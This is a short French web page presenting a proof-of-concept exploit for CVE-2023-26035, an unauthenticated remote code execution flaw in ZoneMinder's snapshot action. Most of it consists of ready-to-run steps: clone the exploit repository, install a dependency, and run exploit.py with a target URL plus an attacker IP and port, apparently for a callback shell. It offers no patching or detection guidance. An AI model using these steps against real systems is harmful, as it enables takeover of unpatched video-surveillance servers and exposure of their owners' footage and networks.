
RCE non authentifiée dans les instantanés de ZoneMinder - Poc Exploit
RCE non authentifiée dans les instantanés ZoneMinder - Exploit PoC
alt img
Les versions de ZoneMinder antérieures à 1.36.33 et 1.37.33 sont vulnérables à une exécution de code à distance non authentifiée en raison de contrôles d'autorisation manquants dans l'action snapshot.
git clone https://github.com/rvizx/CVE-2023-26035
cd CVE-2023-26035
python3 exploit.py
python3 exploit.py -t <target_url> -ip <attacker-ip> -p <port>
pip3 install beautifulsoup4
UnblvR a découvert la vulnérabilité.